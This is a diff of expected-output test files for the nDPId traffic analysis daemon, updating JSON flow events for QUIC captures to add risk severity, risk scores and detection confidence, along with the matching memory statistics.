 00441{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-33.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1607938456563,"flow_last_seen":1607938456563,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1607938456563,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":51430,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1607938456563,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1607938456563,"pkt":"AAAAAAAAAAAAAAAAht1gIDHwBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAByOYRWwTYBOvLAAAAAQiH9eh3C8+VTAijB72XkxHdoQBEtoviUAck6tyLLoPW9VDwFsyJg3YOj5\/ZBBxoLZq+uwOezSI+NQXptD5by+TGWuPRPrDAYZviuXsVHC7HmqDeEDG8QAq3dV\/xeXm5rkywye7b+vdo1p1fctM\/Oux9r7eV+Bkfx5+wJ0fdvlhyFGnTrwdcg8+4C7doPPgPdg\/HlJ+WJBdBNlB5bMDPwE7kBX2Dh4rUsRtMuI8UcuXEYHPlESOyFKyqmw1DOdGJ\/piVc003W0\/LEq1Eo7qm+0VXxD0O2HOCIiEHQSR0LHjT1VxLfzhAmJaat83P4NhBjDwwPEBaziMk5Xx7FlGTbjmQXwNdCCRvlZwHV8Z1FjV1KFEWUlByB6YIRcrWgtYq\/i+4joHr0arERD7m6OPY7fw34Aislp\/J5tfwN5lpBEW4eq0YBQWIW+o0WsbDygLLOE8qK7VrIW545\/s6vWmiqY\/nX3eqKbXLLa\/FVUoUAYah6VY+54jT2WSxlVbjRbKzNCmQ7iFaNpCpIEDqRUT3251KkF2ic95oNqA7SdIHar3DhA1BLknCroi9vMu8dB8ZQzinHdG0dXM7MT\/3xjsj6W1BusBxpaKNCgk4AWnV4woWWMHuv3AkSN3SkyzvUkLVvh69eozjggDPPRwSQSUAzHDWzbhw1M0maJHN9uf4A3ju1BNcFXtgNbzbLvZ8jRjuvbV5+sT2dKCIGszHbDe\/k7VIj14F5Oz9yEIDLSjcjUNYxAEtmmIW3gkE0URoURbr4fR+9IcL0qzkw6dXZu343bgbz5HR6MUnSxTpV9fqwSf9hnrNjraoPMA+2dRpP1Zgg8SJxppmH92oRToz9aDvX2GEC3Onm3NhLiCy9XRFGhGu\/fP4euaO\/LhZROPQcNzbK0KhgrgIkbbcdw+GG0U1DyrSN2MCSa0G\/gdd0iXjRkpuSltfEWcs6h5VKXYCs0nARTLsAmshRBI4tBnyE8czB9KDGhDi69S4dxLc2GhDvI7sBC3oYplXnPFpYJ5UZlYX4x4JzCNfzPKJLkB1GZ\/\/fH4d4Bdn3o+N0leV4SXwVyj8+XQXm2lqcn0l4280XR1PY9wT7WxHSwRDVHU1WF+J6uEthL0G\/TTOA8IENfk0c9FtN1gtuZbVqEenj8UavApG8YgiwEFLw3lw7QwEpdl2suMFgNMJ9GKiLgGbJ0iDoFumS7lgCZ\/nQNWC5kLAQ+6RwzRxTfyP7COmrj9VOCl2+wDLTe3MfV2rc9okYbhZWBQ90PNxn4RsPjc\/Y6ROnBtAhNHbhNOY4vkKTiqPf\/zXa6gyKLJwM4B2ikSmnMEc6pOt0km1BxO3IMATJR3y2TyvQwDT4h3LmpQf0gEdwRzggs5B+E7eqr4GF3leCUThvLN07bE6f2xjlfM9GVfW\/hyXIlfEkPiVHs0uNEuAtqja9wjv+TVSELvsqoLajQtysd2XscH\/uqkhI80k6EzletW\/z347Tefjbi7un6kw52zxXR3upATGEcY8WECkFSms+LV3Cbtq+fVkM8LR8ZIcoDoUWH511e8PHOE07KwOpTJwROur3JKswX2UtackuKBEnRIb2VrFAu8O8Bq\/G9385WeZn1kznfucxDKavwZd9obaQ66d2I\/H3+7RezClYA=="}
-00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1607938456563,"flow_last_seen":1607938456563,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1607938456563,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":51430,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","24":"SNI TLS extension was missing"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}}
+01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1607938456563,"flow_last_seen":1607938456563,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1607938456563,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":51430,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}}
 02131{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1607938456566,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1607938456566,"pkt":"AAAAAAAAAAAAAAAAht1gLBAvBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABEVvI5gTYBOuKAAAAAQijB72XkxHdoQg7VxcI2Jvc+wBAmyNACkF8YFqpKbrULKoDb19+uZg6qvjJtwEJ\/uOaQSa3OSU6O4kzdS3stlDlI1x0pxU6U1p+48IkszqoivEYtB69bd+ITaYbTkxaelp3jMONrgP7+RVKaRNSt1HkpjhOcLPrzWczoHNZnIhNfvDy2JT2t08AucggcJe2\/4B\/vdnrtpqK6V\/yqwGFTMu1rQIkxS92C6tKauoy9+VqrwAAAAEIowe9l5MR3aEIO1cXCNib3PtEAuCsTgG\/NlsvOl6GJP2fa9o99BT145OKWZuTcmr433tc4jI7eA6S9XkiunJFKo6ZwPI0CMllqhzpZg\/M2oExoGin\/1BGN9cmCUQfuYgNqfFCtG+9ndT9HYjrsBCdjtJLmxL7rPr9q0tjGpDyuXZi9R4mNROPUrln\/PkhZzgiM0sHtdd5p\/bNeUYtEqE7ldAVt6\/n44lU+YN3SU+JWXbqssVrfvVzr36h3ab7fYZ2wDsFWfe3UAXx72w0FuOOYB7+7UQe00b5Z0z5SyfSm4P9dPYqojw9+jCHeJHd8IAkR4khzwJfJ3q7ZLCXjemRtbjS+jOnIFHSC581L8cRfFE0puRn3ZcyA6eigK1\/b\/IulmnDweMhm5uzPfRzVpuYtDAmfupBBO\/lq0x9UE6G6aXlrZk5pUsV\/Pqkms2\/6G+WtFFZQVjHMyjk00Lt801D4RBFQF6Pahphh1rFyerbrHyGpVjzLCCjQyphY+Ef9GwnSwZSXfDtl5l6V75F8hdBb7eRQwoSsYy2TAPUn+5EgUUMa1L0FdqwqulhpTwuiKxlEjCwVmTxOQ9cg0ckmklTggiUpDihR6CGEJh4wbwQvtSQI7moaNImb3zhI+1KDCqOesSmC0luDPiQ6HVXRRmZBTcfdXaVe6yn8aOTSuCvFQcYVZJMmDXWA3tjd8oaA17lJRBbd52Hesk8cJ\/YJxx85q2dKnHlb3PDDd1GsYUOHckqW9oBPW3OnKOCPAmLbdAwZewxw5NCtlvRr65YuEBJebGFHlf1HDlzUGnZEYOFz7QCUVI0Cm1TQGPnrse0LdnJMU4XAsVFTZ0rmN1WZ7lpL6siOc2kDO70InGs0erREqxP56ACsZJMVSLIWh+Wtd1TXT7s1cqcJTYFE1niy2vrWekG6gLj5S6d+RexzQMJFxrY7r+11SACpmCHMFInRkZ2X9ItKQsY5EbZalkFRVlIPVyM4egzMKz9sn52T\/vMFKgNzwFrf2sp17iUQaz1IyM4BWPhByUmfVEtsPpNhTudVAjT+DAK93H3WyrArXi\/C2kIO6kQjQL8MrdQf21Vn+lMg29055+PrObIIyJyGedJEXiBJHhcPUZyzw5wKIN3qGujdkkwR3NWZGQsR9D9oFcHebuLVvyY9rfcmZsewBxwBuE+3j7ZET5hnurVax3LpMwvKOC7lHimTxsExq+Apn9MfGeNafcclrRpd8qOhu5Y\/D9oPxLb43JPWxWrwE9\/H\/\/i9MLl+t0zWNInh13oyE1g07E++NmYobon6Smh\/KGoGULC6seHfmLDTFHYkzCH+jMiW6zoYiu7MVxzW\/pT13bjivVb6\/E5Iu6Gt0D2z7Y6bkUG7P9GxtXA2I4cOhOe8m7St\/U9gg=="}
 01466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1607938456566,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":805,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":805,"pkt_l4_len":751,"ts_msec":1607938456566,"pkt":"AAAAAAAAAAAAAAAAht1gLBAvAu8RQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABEVvI5gLvAwKiAAAAAQijB72XkxHdoQg7VxcI2Jvc+0EX7RIgJstg2q\/pC81tAEQflatapq\/RZQEybKUVkOQrHxIiM3xbz3ZbafCyVgp9YFd+JrcvMCpFHqt9ha4UaWT\/CVOhVDMl+x8Qz2Pi7UbhXXzBIpETH8Z7GAVhwJp3720klhijkJwcoDMcJhlagIc47WtHZyC2\/NvYhyD6pe18qYPoUjuwqv+wJE\/ZuFV52ejpLWx76nNhIhGaoM22WiUW2N20UYQh0kubnK8ydedmguDEIxF73mmjfBjQU7d+\/kjc6w69nvaNM1WUtVe+1pIxu53jikC+jWmnb37byYPq9yuXiC3\/7jLmxfDtd9m0NACttAKJA\/JNnc1mj5nC7Y4hcumqIR3HrbC6nuLoYsXX2Zp0f9UgYV0fEqMHvZeTEd2hiKBY6bJdCuJKiCqdgeiTl8HqX5mvvlLWJPlmCEJCqIrxf4AkkUVGE4BSMBWdBgCOEniMLjdilc+qHYhwYNZ7tIGoZF6d6e+Y9Yje+rmHUnbpVz7jAirlBT5H70Gx8i7gxMgFdddmzogwCmelHc7wvmzlC3bbPNEkyFgFvBjt104z4kXXH0FdVNTjvLWqMrMbCISgSyaKcGImnAuSczuqI+IdDAVMV3KZetnbRYTODT0MnkiyhjZS2c2FGhXiSczCoL+nOf5G7u0IMQ1S2B5gWkWA4zkPvuFc+aQWgo\/5D9qUsPB6Q6\/Lj7MI5fOlLauhfzQmW9GNJRpuqdg3\/ZmECJ9z4HnHnfJd1luO6tXDuMawQhxYeD2xpO\/QqBEAH7sAsFTq\/abn1uTe8vqVNYsZRf0hwJAKRW\/BJxg25OGxhUlcywIb3vGZoq+dJmTxYWX\/eqXVDs+dco62ygOlroB9wJoypHt\/D+y7eYcgKaWYE3hnP28kNmmEQuWhfqoLHNJTZas1p5oY5kezaxnU27xSuQXqGdvZdYxhIaICM8EHXUKIOqW8fx5oue03v9+86w=="}
-00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":992,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":992,"flow_first_seen":1607938456563,"flow_last_seen":1607938456578,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1279218,"flow_avg_l4_payload_len":1289,"midstream":0,"ts_msec":1607938456578,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":51430,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","24":"SNI TLS extension was missing"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00919{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":992,"source":"quic-33.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":992,"flow_first_seen":1607938456563,"flow_last_seen":1607938456578,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1279218,"flow_avg_l4_payload_len":1289,"midstream":0,"ts_msec":1607938456578,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":51430,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
 00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":992,"source":"quic-33.pcapng","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 992/992
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4629089 bytes
-~~ total memory freed........: 4629089 bytes
-~~ total allocations/frees...: 100557/100557
+~~ total memory allocated....: 4714042 bytes
+~~ total memory freed........: 4714042 bytes
+~~ total allocations/frees...: 102147/102147
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
 ~~ json string max len.......: 2137 chars
diff --git a/test/results/quic-fuzz-overflow.pcapng.out b/test/results/quic-fuzz-overflow.pcapng.out
index 79bb79b0a..5993fdd2e 100644
--- a/test/results/quic-fuzz-overflow.pcapng.out
+++ b/test/results/quic-fuzz-overflow.pcapng.out
@@ -1,8 +1,8 @@
 00452{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633957625000,"flow_last_seen":1633957625000,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1633957625000,"l3_proto":"ip4","src_ip":"255.255.255.255","dst_ip":"255.255.255.32","src_port":8224,"dst_port":8224,"l4_proto":"udp","flow_datalink":228,"flow_max_packets":3}
 03004{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1633957625000,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1280,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":1280,"pkt_l4_len":1260,"ts_msec":1633957625000,"pkt":"RSAFACAgIAAgESAg\/\/\/\/\/\/\/\/\/yAgICAgICAgIMhRMDI0ICAgICAgICAgICD\/\/yD\/\/\/\/\/\/yAgIAAAoAEgBENITE8gACAgVUFJRP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/yAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/yAgICAgICAg\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/yAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/yAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8gICAgICAgICAgICAgICAgIP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ICAgICAgICAgICAgICAgICD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ICAgICAgICAgICAgICAgICA="}
-00730{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633957625000,"flow_last_seen":1633957625000,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1633957625000,"l3_proto":"ip4","src_ip":"255.255.255.255","dst_ip":"255.255.255.32","src_port":8224,"dst_port":8224,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","24":"SNI TLS extension was missing"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
-00760{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1633957625000,"flow_last_seen":1633957625000,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1633957625000,"l3_proto":"ip4","src_ip":"255.255.255.255","dst_ip":"255.255.255.32","src_port":8224,"dst_port":8224,"l4_proto":"udp","flow_datalink":228,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","24":"SNI TLS extension was missing"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633957625000,"flow_last_seen":1633957625000,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1633957625000,"l3_proto":"ip4","src_ip":"255.255.255.255","dst_ip":"255.255.255.32","src_port":8224,"dst_port":8224,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00949{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1633957625000,"flow_last_seen":1633957625000,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1633957625000,"l3_proto":"ip4","src_ip":"255.255.255.255","dst_ip":"255.255.255.32","src_port":8224,"dst_port":8224,"l4_proto":"udp","flow_datalink":228,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
 00167{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1/1
@@ -12,9 +12,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594858 bytes
-~~ total memory freed........: 4594858 bytes
-~~ total allocations/frees...: 99554/99554
+~~ total memory allocated....: 4679811 bytes
+~~ total memory freed........: 4679811 bytes
+~~ total allocations/frees...: 101144/101144
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 172 chars
 ~~ json string max len.......: 3009 chars
diff --git a/test/results/quic-mvfst-22.pcap.out b/test/results/quic-mvfst-22.pcap.out
index f7d510f13..28a7321e2 100644
--- a/test/results/quic-mvfst-22.pcap.out
+++ b/test/results/quic-mvfst-22.pcap.out
@@ -1,11 +1,11 @@
 00445{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":24710,"flow_last_seen":24710,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":24710,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02079{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":24710,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1274,"pkt_l4_len":1240,"ts_msec":24710,"pkt":"UlQAEjUCCAAnANMtCABFAATsAABAAEARtN0KAAIPHw1WCIsRAbsE2LapyfrOsAEIVt4FS0mAWdwAAES+glHsK6O\/Oq7IqxunKa1n3XFv8eVEdrO\/buZ2LMAVEB2NyWCg6hfO6EP+vLVLmftkS1PJQqVl7L+7l7BI482Kpj4ofT9JnOQ0xEE4Vys3R4pwXiPc1lMJx32RX9zKYm+Z1fbMOyayi7zU0q+i63OayYrYD3jSt+Vvv7BMyIgMJ2yBRML4Cvl27dkQOy02PKy9hJb4U9IakyZ9jxJvJUG6tfB\/LJZUaX2z8xaFt+J6lEY3AOj1WgBxHOY78xSQcl0cfAaJSIKcA9Vn4sv\/fiPAKil0a5hIx6QXM2jiv4vFSqcgQHPhjbxlmksCUD71+BcElvTx09somsejpTEXOX5DumiTu+RmoxzAPxad\/yoHUmpVtJwSnjk0zwlToGO6SDPnEODnYt3LIvHRsx7mnFExLWnr+yQHfYFCeLNMctGGZBMubCx4gjt048OWguRvM18ud1xw3iRiS5rez8OMJIfcMnRlbnJA4MyOhWSWUbuYwKHXBZjNJSArgDpEssUAVBEOZQpnBVnXDGsqdTXz0eM1y7mnenMoiYqQeMnNMBDyturR